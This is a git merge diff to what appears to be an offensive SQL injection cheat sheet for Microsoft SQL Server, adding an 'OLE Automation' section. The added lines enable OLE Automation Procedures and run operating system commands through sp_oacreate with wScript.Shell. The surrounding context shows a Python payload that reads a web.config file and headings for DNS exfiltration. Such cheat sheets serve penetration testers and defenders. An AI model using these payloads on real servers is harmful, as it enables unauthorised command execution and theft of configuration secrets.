Merge 3c96a15f58 into e961fef231

2026-05-08 04:28:39 +02:00 · 2026-04-28 09:12:59 +00:00 · 2026-04-28 09:12:59 +00:00 · 99e17317e6
commit 99e17317e6
parent e961fef231 3c96a15f58
1 changed files with 28 additions and 0 deletions
--- a/Injection/MSSQL
+++ b/Injection/MSSQL
@ -22,6 +22,7 @@
 * [MSSQL Command Execution](#mssql-command-execution)
    * [XP_CMDSHELL](#xp_cmdshell)
    * [Python Script](#python-script)
+    * [OLE Automation](#ole-automation)
 * [MSSQL Out of Band](#mssql-out-of-band)
    * [MSSQL DNS Exfiltration](#mssql-dns-exfiltration)
    * [MSSQL UNC Path](#mssql-unc-path)
@ -295,6 +296,33 @@ EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__im
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
 ```

+### OLE Automation
+
+`Object Linking and Embedding (OLE)` is a technology that allows one application to link objects into another application.  It was originally designed for Microsoft Office (e.g. to embed Excel sheets into Word documents) and eventually became the foundation for the Component Object Model (COM).  OLE Automation enables a SQL server to interact with arbitrary COM objects.
+
+```sql
+-- Check current status
+
+EXEC sp_configure 'Ole Automation Procedures'; 
+
+-- Enable OLE Automation
+
+EXEC sp_configure 'Ole Automation Procedures', 1; 
+RECONFIGURE; 
+
+-- Verify it's enabled
+
+EXEC sp_configure 'Ole Automation Procedures';
+
+-- run command
+
+DECLARE @output INT; DECLARE @ProgramToRun VARCHAR(500); SET @ProgramToRun = 'Run("whoami")'; EXEC sp_oacreate 'wScript.Shell', @output out; EXEC sp_oamethod @output, @ProgramToRun; EXEC sp_oadestroy @output;
+
+
+-- NOTE that it does not print output (it is blind execution)
+
+```
+
 ## MSSQL Out of Band

 ### MSSQL DNS exfiltration